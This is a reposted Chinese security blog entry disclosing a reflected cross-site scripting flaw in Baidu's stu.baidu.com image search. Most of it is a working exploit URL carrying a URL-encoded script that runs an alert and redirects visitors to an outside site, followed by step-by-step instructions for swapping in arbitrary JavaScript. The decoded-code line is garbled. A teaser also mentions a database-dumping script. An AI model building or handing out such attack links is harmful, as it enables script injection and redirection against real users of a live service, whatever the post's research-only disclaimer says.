【漏洞】百度 XSS 跨站 跳转 执行 漏洞一个

admin
admin
admin
139803
文章
114
评论
2021年4月3日18:56:51评论34 views字数 1107阅读3分41秒阅读模式

百度XSS跨站漏洞一个,漏洞演示:

http://stu.baidu.com/i?rt=0&rn=10&ct=1&tn=baiduimage&objurl=%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%4E%75%63%6C%65%61%72%27%41%74%6B%20%32%30%31%30%2D%31%32%2D%32%39%20%32%30%3A%31%39%3A%31%37%22%29%3B%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%63%78%2E%63%63%2F%22%3C%2F%73%63%72%69%70%74%3E

没啥技术含量的鸡肋漏洞,不解释了。。。

利用代码:

http://stu.baidu.com/i?rt=0&rn=10&ct=1&tn=baiduimage&objurl=%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%4E%75%63%6C%65%61%72%27%41%74%6B%20%32%30%31%30%2D%31%32%2D%32%39%20%32%30%3A%31%39%3A%31%37%22%29%3B%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%63%78%2E%63%63%2F%22%3C%2F%73%63%72%69%70%74%3E

红色部分为URL编码过的JavaScript代码,未编码的如下:

https://lcx.cc/">

利用步骤:

    1、将蓝色部分,替换为你要执行的JavaScript代码。

    2、替换好后,再进行URL编码。

    3、将编码后的结果,替换上边红色部分。

    4、最终的URL地址既是漏洞利用地址。

文章来源于lcx.cc:【漏洞】百度 XSS 跨站 跳转 执行 漏洞一个

相关推荐: jsp wget 脱裤脚本,拖数据库脚本

jsp wget脱裤脚本 Gavin | 2014-05-20 17:27 刚刚和朋友看了下jsp也可以实现 "); } } if (num >= MAX_CACHE_NUM) { out.flush(); num = 0; } } rs.close()…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:56:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞】百度 XSS 跨站 跳转 执行 漏洞一个https://cn-sec.com/archives/319338.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息